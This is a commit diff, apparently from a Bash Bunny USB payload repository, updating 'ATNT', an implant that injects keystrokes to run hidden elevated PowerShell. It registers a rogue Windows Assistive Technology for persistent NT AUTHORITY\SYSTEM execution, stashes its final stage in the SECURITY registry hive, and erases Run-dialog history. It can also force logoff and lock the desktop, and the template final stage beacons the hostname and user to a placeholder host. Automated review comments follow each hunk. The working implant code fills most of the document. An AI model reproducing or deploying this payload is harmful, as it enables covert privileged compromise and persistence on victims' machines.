ATNT update: working version (#461)
* Delete stage3.ps1
* Update ATNT to work as intended. Update ATNT to work as intended. Requires reboot or logoff to fully register AT.
* Remove DONE file in cleanup. Forgot to remove DONE file. Now also makes sure this file does not exist before running.

pull/462/head
parent 4f6cd4b54d
commit 1efd6a1116
@ -0,0 +1,18 @@
|
||||||
|
# ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||||
|
|
||||||
|
Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||||
|
|
||||||
|
## Options
|
||||||
|
### :warning: FORCE_LOGOFF
|
||||||
|
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||||
|
### :warning: LOCK_ON_USER
|
||||||
|
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
|
||||||
|
### RUN_IMMEDIATELY
|
||||||
|
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.
|
||||||
|
|
||||||
|
## final_stage.ps1
|
||||||
|
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
|
||||||
|
```powershell
|
||||||
|
`$example = 1;
|
||||||
|
Write-Host `$example;
|
||||||
|
```
|
|
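Review bot: the README describes the three options but never says where they are set or what their defaults are; add a line pointing at the `FORCE_LOGOFF=true`, `LOCK_ON_USER=true` and `RUN_IMMEDIATELY=true` assignments at the top of the bash payload in this same commit, since a reader of the README alone cannot tell that all three default to true. Two wording points: under RUN_IMMEDIATELY, `NT AUTHORITY/SYSTEM` should use the backslash form the title uses (`NT AUTHORITY\SYSTEM`), and "The AT is ran as User" should read "The AT is run as the user". The README also has no removal section; the locations this commit writes (the `atnt` key under `Accessibility\ATs`, the `Configuration` value under `HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility`, and `HKLM:\SECURITY\Policy\PolAtnt`) should be listed in one place so that lab cleanup and detection engineering have a single reference.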
@ -1 +1,2 @@
|
||||||
iwr ('https://example.com/beacon_'+(whoami))
|
<#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
|
||||||
|
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))
|
|
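Review bot: the replacement line drops the explicit `https://` scheme the previous line had (`"example.com/{0}:{1}"` versus `'https://example.com/beacon_'`), so whether `iwr` accepts the scheme-less string now depends on the PowerShell version on the host; keep the scheme in the placeholder URL. The commented-out `<#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>` line is dead code in what the README presents as a template; if it is meant as a usage example, label it as such in the comment, otherwise remove it. Since this file is spliced into a double-quoted here-string by the `sed` rule in the bash payload, a one-line comment here repeating the README's rule that any `$variable` must be written as `` `$variable `` would save anyone who edits only this file from a silent expansion bug.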
@ -1,86 +1,75 @@
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
|
||||||
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
|
||||||
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
# To persistently run code with NT AUTHORITY\SYSTEM rights.
|
||||||
# Author: 9o3
|
# Author: 9o3
|
||||||
# Twitter: @BugBot4
|
# Twitter: @BugBot4
|
||||||
# Version: 1.0
|
# Version: 1.1
|
||||||
# Category: Execution
|
# Category: Execution
|
||||||
# Attackmodes: HID, Storage
|
# Attackmodes: HID, Storage
|
||||||
#
|
#
|
||||||
# LED STATUS
|
# LED STATUS
|
||||||
# ==========
|
# ==========
|
||||||
# SETUP.......Generate stage files
|
# SETUP.......Generate stage file
|
||||||
# STAGE1......Run hidden elevated PowerShell window that creates the AT
|
# ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
|
||||||
# STAGE2......Trigger the newly created AT
|
# CLEANUP.....Remove generated files
|
||||||
# STAGE3......Update the newly created AT to run the final stage
|
# FINISH......Finished
|
||||||
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage
|
#
|
||||||
# CLEANUP.....Remove generated files
|
# OPTIONS
|
||||||
# FINISH......Finished
|
# =======
|
||||||
#
|
# Final stage configured from included final_stage.ps1 script
|
||||||
# OPTIONS
|
# FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
|
||||||
# =======
|
# LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
|
||||||
# Final stage configured from included final_stage.ps1 script
|
# RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
|
||||||
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop
|
FORCE_LOGOFF=true
|
||||||
run_final_stage=true
|
LOCK_ON_USER=true
|
||||||
|
RUN_IMMEDIATELY=true
|
||||||
LED SETUP
|
|
||||||
GET SWITCH_POSITION
|
######## Generate stage file ########
|
||||||
cd /root/udisk/payloads/
|
# Alter second stage based on settings & merge final stage.ps1 into second stage
|
||||||
cd $SWITCH_POSITION
|
LED SETUP
|
||||||
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2
|
GET SWITCH_POSITION
|
||||||
sed '/!FINAL_STAGE!/{
|
rm /root/udisk/DONE
|
||||||
s/!FINAL_STAGE!//g
|
cd /root/udisk/payloads/$SWITCH_POSITION
|
||||||
r final_stage.ps1
|
if [ "$RUN_IMMEDIATELY" = true ] ; then
|
||||||
}' stage3.ps1 > 3
|
RUN_IMMEDIATELY_TEXT='iex `$p'
|
||||||
|
fi
|
||||||
ATTACKMODE HID STORAGE
|
if [ "$LOCK_ON_USER" = true ] ; then
|
||||||
|
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
|
||||||
######## Run hidden elevated PowerShell window ########
|
fi
|
||||||
# Runs hidden elevated powershell which executes stage2.ps1
|
if [ "$FORCE_LOGOFF" = true ] ; then
|
||||||
LED STAGE1
|
FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
|
||||||
QUACK GUI r
|
fi
|
||||||
QUACK DELAY 500
|
|
||||||
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
|
||||||
QUACK DELAY 200
|
s/!FINAL_STAGE!//g
|
||||||
QUACK CTRL-SHIFT ENTER
|
r final_stage.ps1
|
||||||
QUACK DELAY 750
|
}' stage2.ps1 > 2
|
||||||
QUACK LEFTARROW
|
|
||||||
QUACK DELAY 100
|
ATTACKMODE HID STORAGE
|
||||||
QUACK ENTER
|
|
||||||
|
######## Run hidden elevated PowerShell window ########
|
||||||
######## Trigger the newly created AT ########
|
# Runs hidden elevated powershell which executes stage2.ps1
|
||||||
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM
|
LED STAGE1
|
||||||
# The AT gets and executes stage3.ps1
|
QUACK GUI r
|
||||||
LED STAGE2
|
QUACK DELAY 500
|
||||||
QUACK DELAY 1000
|
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
|
||||||
QUACK CTRL-ALT DEL
|
QUACK DELAY 200
|
||||||
QUACK DELAY 750
|
QUACK CTRL-SHIFT ENTER
|
||||||
QUACK ESC
|
QUACK DELAY 1200
|
||||||
|
QUACK LEFTARROW
|
||||||
######## Update the newly created AT ########
|
QUACK DELAY 200
|
||||||
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM
|
QUACK ENTER
|
||||||
# Updates the newly created AT to read and execute the final stage from the SECURITY hive
|
until [ -f /root/udisk/DONE ]
|
||||||
LED STAGE3
|
do
|
||||||
until [ -f /root/udisk/DONE ]
|
sleep 0.2
|
||||||
do
|
done
|
||||||
sleep 0.2
|
|
||||||
done
|
######## Remove generated files ########
|
||||||
if [ "$run_final_stage" = true ] ; then
|
# Removes the generated stage file and sync file system
|
||||||
######## Trigger the updated AT ########
|
LED CLEANUP
|
||||||
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage
|
rm 2
|
||||||
LED STAGE4
|
rm /root/udisk/DONE
|
||||||
QUACK CTRL-ALT DEL
|
sync
|
||||||
QUACK DELAY 750
|
LED FINISH
|
||||||
QUACK ESC
|
|
||||||
fi
|
|
||||||
|
|
||||||
######## Remove generated files ########
|
|
||||||
# Removes the generated stages and the DONE file used to indicate the end of the third stage
|
|
||||||
LED CLEANUP
|
|
||||||
rm /root/udisk/DONE
|
|
||||||
rm 2
|
|
||||||
rm 3
|
|
||||||
sync
|
|
||||||
LED FINISH
|
|
||||||
|
|
|
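Review bot: the new `rm /root/udisk/DONE` line after `GET SWITCH_POSITION` runs without `-f`, so on every run where the file is already absent (the normal case after a clean CLEANUP) it prints a "No such file or directory" error; use `rm -f /root/udisk/DONE` here and in the CLEANUP block. The LED STATUS header now lists `ATTACK` for the PowerShell step, but the code still calls `LED STAGE1`; make the header and the `LED` call agree. The `cd /root/udisk/payloads/$SWITCH_POSITION` line is unchecked, so if it fails the `sed ... stage2.ps1 > 2` line writes into the wrong directory; use `cd ... || exit 1`. Finally, the `until [ -f /root/udisk/DONE ]` loop has no upper bound, so if the elevated PowerShell never writes `DONE` (for example when the UAC prompt is declined) the payload never reaches CLEANUP and the generated `2` file is left on the udisk; this should at least be documented in the header.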
@ -1,5 +1,5 @@
|
||||||
#Remove latest run entry
|
#Remove latest run entry
|
||||||
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);
|
||||||
|
|
||||||
# Create AT to run next stage
|
# Create AT to run next stage
|
||||||
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
|
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
|
||||||
|
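Review bot: `gpv` (Get-ItemPropertyValue) replaces `(gp $p).$m` on the `RunMRU` line; that cmdlet only exists from PowerShell 5.0, so the header of the bash payload or the README should state the minimum PowerShell version this change now requires, since the old expression worked on earlier versions. The `#Remove latest run entry` comment should also say what is being removed (the `RunMRU` history entry left by the `GUI r` step in the bash payload), so that anyone auditing a test host knows this history value is deliberately deleted by the stage rather than missing for another reason.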
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
|
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
|
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
|
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
|
||||||
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force
|
New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force
|
||||||
|
|
||||||
|
# The value of this is ran when the AT is launched.
|
||||||
|
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
|
||||||
|
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
|
||||||
|
New-ItemProperty -Path $atnt -Name "0" -Value @"
|
||||||
|
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
|
||||||
|
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
|
||||||
|
"@
|
||||||
|
|
||||||
|
# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
|
||||||
|
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
|
||||||
|
New-ItemProperty -Path $atnt -Name "1" -Value @"
|
||||||
|
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
|
||||||
|
`$p = gpv `$a 2;
|
||||||
|
sal nip New-ItemProperty;
|
||||||
|
sal rip Remove-ItemProperty;
|
||||||
|
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
|
||||||
|
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
|
||||||
|
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
|
||||||
|
rip -Path `$a -Name "2" -Force;
|
||||||
|
rip -Path `$a -Name "1" -Force;
|
||||||
|
rip -Path `$a -Name "0" -Force;
|
||||||
|
#RI#
|
||||||
|
"@
|
||||||
|
|
||||||
|
# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
|
||||||
|
New-ItemProperty -Path $atnt -Name "2" -Value @"
|
||||||
|
!FINAL_STAGE!
|
||||||
|
|
||||||
|
"@
|
||||||
|
|
||||||
|
|
||||||
#Add the newly created AT to automatically start on a desktop switch.
|
#Add the newly created AT to automatically start on a desktop switch.
|
||||||
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force
|
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;
|
||||||
|
|
||||||
|
#Let the Bash Bunny know we're done here & Eject.
|
||||||
|
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
||||||
|
New-Item -ItemType file $bb"DONE";
|
||||||
|
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
||||||
|
|
||||||
|
#FL#
|
||||||
|
|
|
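Review bot: the comments on the three new registry values mix `NT AUTHORITY/SYSTEM` (forward slash) with the `NT AUTHORITY\SYSTEM` literal the code actually compares against; use the backslash form throughout, and fix "user privilages" to "user privileges", "This trigger the AT" to "This triggers the AT", and "is ran" to "is run". The `# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.` comment overstates the protection: the default ACL on `HKLM\SECURITY` grants SYSTEM access, but a local administrator can take ownership of the key and read it, so "not readable by default" is the accurate wording. Nothing in this hunk or the README documents removal of what it creates: the `Remove-ItemProperty` calls in value `1` only delete the staging values `2`, `1` and `0`, while the `atnt` key itself (with `StartExe` pointing at `mshta.exe`), the `Configuration` value under `HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility`, and `HKLM:\SECURITY\Policy\PolAtnt` remain; list these locations in the README so they can be removed and monitored.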
@ -1,14 +0,0 @@
|
||||||
$payload = @"
|
|
||||||
!FINAL_STAGE!
|
|
||||||
"@
|
|
||||||
|
|
||||||
New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
|
|
||||||
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force
|
|
||||||
|
|
||||||
# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
|
|
||||||
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force
|
|
||||||
|
|
||||||
#Let the Bash Bunny know we're done here & Eject.
|
|
||||||
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
|
|
||||||
New-Item -ItemType file $bb"DONE";
|
|
||||||
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
|
|
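Review bot: the deletion is consistent with the rest of the commit (the bash payload no longer generates or removes a `3` file, and the same `PolAtnt` write and `StartParams` rewrite now live in registry value `1` of stage2.ps1), but the commit message only says "Delete stage3.ps1"; record in the message or README that the third stage was folded into stage2's value `1`, because the LED STATUS header described STAGE3 and STAGE4 before this change and a reader comparing versions will otherwise look for where that logic went.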